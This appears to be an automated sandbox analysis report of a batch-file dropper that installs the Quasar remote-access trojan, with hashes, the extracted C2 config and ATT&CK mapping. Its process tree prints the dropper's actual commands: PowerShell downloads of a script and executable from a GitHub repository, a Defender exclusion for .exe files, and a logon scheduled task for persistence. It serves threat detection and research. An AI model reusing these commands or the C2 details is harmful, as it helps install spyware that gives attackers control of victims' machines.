quasar | 57970a3c842bcaf6860a9d271b2725b08fc07a50ca18ff852983d8e80905a0c7

General

Target

main (1).bat
Size

15KB
MD5

837e6e693eab2459822a681dd8829347
SHA1

77417d665e66ae2f962f52b3d7c916f0772f0615
SHA256

57970a3c842bcaf6860a9d271b2725b08fc07a50ca18ff852983d8e80905a0c7
SHA512

54f3d0f4a69d785dd6012f5376d131f3d4cdfa1885577c46468bf1e37aed1d7da86cc11b7efcddf53eede8a4803a16e14c008493404906e3b870ccd441278a48
SSDEEP

384:wK1+KSlKC8kumFq/vM2pHz6YBM3P6QDSJO4ytvJ2/N2cGTuEhckk7VgFHbWvaPn0:wK1+KSlKC8++vM23b+CJXPn

Score

10^/10

quasar bot defense_evasion execution spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

bot

C2

wooting2000-47095.portmap.host:47095

Mutex

2e05f1ef-743b-4020-b18a-7f4276517e8b

Attributes

encryption_key
E83D6FC31962786DAEA703F111D2381786DF06CA
install_name
Modification1.5.14.12.exe
log_directory
Logs
reconnect_delay
3126
startup_key
explorer.dll
subdirectory
SubDir

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Modification11910275.exe	family_quasar
behavioral1/memory/4576-47-0x0000000000460000-0x0000000000784000-memory.dmp	family_quasar

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

2 1040 powershell.exe
4 1584 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Powershell Invoke Web Request.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid process

1584 powershell.exe
1040 powershell.exe
3840 powershell.exe
Executes dropped EXE 2 IoCs

Processes:

Modification11910275.exeModification1.5.14.12.exe

pid process

4576 Modification11910275.exe
1512 Modification1.5.14.12.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

1 raw.githubusercontent.com
2 raw.githubusercontent.com
4 raw.githubusercontent.com

flow	pid	process
2	1040	powershell.exe
4	1584	powershell.exe

pid	process
1584	powershell.exe
1040	powershell.exe
3840	powershell.exe

pid	process
4576	Modification11910275.exe
1512	Modification1.5.14.12.exe

flow	ioc
1	raw.githubusercontent.com
2	raw.githubusercontent.com
4	raw.githubusercontent.com

Drops file in System32 directory 5 IoCs

Processes:

Modification11910275.exeModification1.5.14.12.exe

description	ioc	process
File created	C:\Windows\system32\SubDir\Modification1.5.14.12.exe	Modification11910275.exe
File opened for modification	C:\Windows\system32\SubDir\Modification1.5.14.12.exe	Modification11910275.exe
File opened for modification	C:\Windows\system32\SubDir	Modification11910275.exe
File opened for modification	C:\Windows\system32\SubDir\Modification1.5.14.12.exe	Modification1.5.14.12.exe
File opened for modification	C:\Windows\system32\SubDir	Modification1.5.14.12.exe

Hide Artifacts: Ignore Process Interrupts 1 TTPs 1 IoCs
Command interpreters often include specific commands/flags that ignore errors and other hangups.
defense_evasion

Ignore Process Interrupts
T1564.011

Processes:

powershell.exe

pid process

4700 powershell.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exeschtasks.exe

pid process

1980 schtasks.exe
3268 schtasks.exe

pid	process
4700	powershell.exe

pid	process
1980	schtasks.exe
3268	schtasks.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1040	powershell.exe
1040	powershell.exe
3840	powershell.exe
3840	powershell.exe
1584	powershell.exe
1584	powershell.exe
4700	powershell.exe
4700	powershell.exe
4700	powershell.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exeModification11910275.exeModification1.5.14.12.exe

description	pid	process
Token: SeDebugPrivilege	1040	powershell.exe
Token: SeDebugPrivilege	3840	powershell.exe
Token: SeDebugPrivilege	1584	powershell.exe
Token: SeDebugPrivilege	4700	powershell.exe
Token: SeDebugPrivilege	4576	Modification11910275.exe
Token: SeDebugPrivilege	1512	Modification1.5.14.12.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Modification1.5.14.12.exe

pid process

1512 Modification1.5.14.12.exe

pid	process
1512	Modification1.5.14.12.exe

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

cmd.execmd.exeModification11910275.exeModification1.5.14.12.exe

description	pid	process	target process
PID 5936 wrote to memory of 1040	5936	cmd.exe	powershell.exe
PID 5936 wrote to memory of 1040	5936	cmd.exe	powershell.exe
PID 5936 wrote to memory of 1536	5936	cmd.exe	cmd.exe
PID 5936 wrote to memory of 1536	5936	cmd.exe	cmd.exe
PID 1536 wrote to memory of 1764	1536	cmd.exe	cacls.exe
PID 1536 wrote to memory of 1764	1536	cmd.exe	cacls.exe
PID 1536 wrote to memory of 3840	1536	cmd.exe	powershell.exe
PID 1536 wrote to memory of 3840	1536	cmd.exe	powershell.exe
PID 1536 wrote to memory of 1584	1536	cmd.exe	powershell.exe
PID 1536 wrote to memory of 1584	1536	cmd.exe	powershell.exe
PID 1536 wrote to memory of 4576	1536	cmd.exe	Modification11910275.exe
PID 1536 wrote to memory of 4576	1536	cmd.exe	Modification11910275.exe
PID 1536 wrote to memory of 4700	1536	cmd.exe	powershell.exe
PID 1536 wrote to memory of 4700	1536	cmd.exe	powershell.exe
PID 4576 wrote to memory of 1980	4576	Modification11910275.exe	schtasks.exe
PID 4576 wrote to memory of 1980	4576	Modification11910275.exe	schtasks.exe
PID 4576 wrote to memory of 1512	4576	Modification11910275.exe	Modification1.5.14.12.exe
PID 4576 wrote to memory of 1512	4576	Modification11910275.exe	Modification1.5.14.12.exe
PID 1512 wrote to memory of 3268	1512	Modification1.5.14.12.exe	schtasks.exe
PID 1512 wrote to memory of 3268	1512	Modification1.5.14.12.exe	schtasks.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\main (1).bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:5936
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell -Command "Invoke-Webrequest 'https://raw.githubusercontent.com/walks111551/09672018256120856125/main/installer.bat' -OutFile installer.bat"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1040
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K installer.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1536
- - C:\Windows\system32\cacls.exe
    "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
    3⤵
    PID:1764
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command "Set-MpPreference -ExclusionExtension exe"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3840
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command "Invoke-Webrequest 'https://raw.githubusercontent.com/walks111551/09672018256120856125/main/Modification11910275.exe' -OutFile Modification11910275.exe"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1584
- - C:\Users\Admin\AppData\Local\Temp\Modification11910275.exe
    Modification11910275.exe
    3⤵
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4576
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "explorer.dll" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Modification1.5.14.12.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1980
  - - C:\Windows\system32\SubDir\Modification1.5.14.12.exe
      "C:\Windows\system32\SubDir\Modification1.5.14.12.exe"
      4⤵
      Executes dropped EXE
      Drops file in System32 directory
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:1512
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "explorer.dll" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Modification1.5.14.12.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3268
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell -Command "Get-Process cmd -ErrorAction SilentlyContinue | ForEach-Object { $_.Kill() }"
    3⤵
    - Hide Artifacts: Ignore Process Interrupts
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4700

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Persistence

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Privilege Escalation

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Defense Evasion

Hide Artifacts

1

T1564

Ignore Process Interrupts

1

T1564.011

Credential Access

Discovery

Query Registry

1

T1012

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
5f4c933102a824f41e258078e34165a7

SHA1
d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee

SHA256
d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2

SHA512
a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6d4402612bda873fb4bab65eac0a8772

SHA1
c530205a19f3658ade260b06ef372ed7938396b7

SHA256
55e413f8065e7981ae75223105edd1f3d8b437059b683b05ca72840caf6aeeed

SHA512
0513addf0c6ca86c880d4668f5309130d5891d5aabc641f3018d614202a93ddf930f8ea383e3c70a95479d7e92dfec3637d4f9dafe67710e31124d167a4e3097

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
3b4b2cd164a593da3719d19456ebd35c

SHA1
5c661d81019c2a7b551f1c70ae4cd8bbee58d799

SHA256
c2f30684ebc8660125d54b1459cff22b11d21daf174535f07abb60cc434d18cf

SHA512
9eb38c3703449098fc153be268ed5aacc814299a3593194968511e85539e74513e27484d268b6798f8fa2534c3c2f07d706bf8e688b19715c049215661a1e206

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b40a84a2f986075497480cf96a2f7e06

SHA1
d212907623ff61031df93bfd9b8c2818709a9e2f

SHA256
2beb6bb29078085fc4a0b5cc5ccadc9422712d399ed4ec1bce2b30e19eb7ca86

SHA512
37e5aceb28371bdd48612c694057312ff19b24b3f02a55bd52a466f4c6b0a0d46e5a448195790d4a4aad95e9205040a7e5b40623397c76293d4351a2b0ec5e0f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Modification11910275.exe

Filesize
3.1MB

MD5
fa9b1524e725c4a251d07007f15fa947

SHA1
5c023619d8180b611acb544fa1cd8bd31de9e61c

SHA256
0cbcab350f25f5764dc967cf6f764eccdd094b1f8ca14d60a731713ace6b1aec

SHA512
dac63f0970092186a909dafeb75cee3e1ad3b393984cf78a1d88e339a39ef235567f74b7a874b237762b8a46e74f8cb319add4bcbc4bdf8f76ec8e1476fb44db

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_it0rh5ef.aqa.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\installer.bat

Filesize
1KB

MD5
43bd9a829d434583f1c14da28dca72f6

SHA1
8fac8d694f4c15d42458bdc5540e0547cb88c83c

SHA256
be6d97cbf700b60bb57bf24889af41c0e3e4d3c70800bc164ef71a0608beb6df

SHA512
2bbb73cf8c2a6d0e61ec58b2a125240daf73c87742f377fc2aede5ce24e11f492044b47c98918168148c632b2c4f3f058feef45479265dd51951aac8ceb585da

Download Submit
memory/1040-12-0x00007FF912A70000-0x00007FF913532000-memory.dmp

Filesize
10.8MB

Download
memory/1040-11-0x00007FF912A70000-0x00007FF913532000-memory.dmp

Filesize
10.8MB

Download
memory/1040-9-0x0000025D1D1D0000-0x0000025D1D1F2000-memory.dmp

Filesize
136KB

Download
memory/1040-10-0x00007FF912A70000-0x00007FF913532000-memory.dmp

Filesize
10.8MB

Download
memory/1040-0-0x00007FF912A73000-0x00007FF912A75000-memory.dmp

Filesize
8KB

Download
memory/1040-16-0x00007FF912A70000-0x00007FF913532000-memory.dmp

Filesize
10.8MB

Download
memory/1512-64-0x000000001BE00000-0x000000001BE50000-memory.dmp

Filesize
320KB

Download
memory/1512-65-0x000000001CC90000-0x000000001CD42000-memory.dmp

Filesize
712KB

Download
memory/1512-68-0x000000001BEB0000-0x000000001BEC2000-memory.dmp

Filesize
72KB

Download
memory/1512-69-0x000000001CC10000-0x000000001CC4C000-memory.dmp

Filesize
240KB

Download
memory/3840-32-0x00007FF912A70000-0x00007FF913532000-memory.dmp

Filesize
10.8MB

Download
memory/3840-30-0x00007FF912A70000-0x00007FF913532000-memory.dmp

Filesize
10.8MB

Download
memory/3840-28-0x00007FF912A70000-0x00007FF913532000-memory.dmp

Filesize
10.8MB

Download
memory/3840-19-0x00007FF912A70000-0x00007FF913532000-memory.dmp

Filesize
10.8MB

Download
memory/4576-47-0x0000000000460000-0x0000000000784000-memory.dmp

Filesize
3.1MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads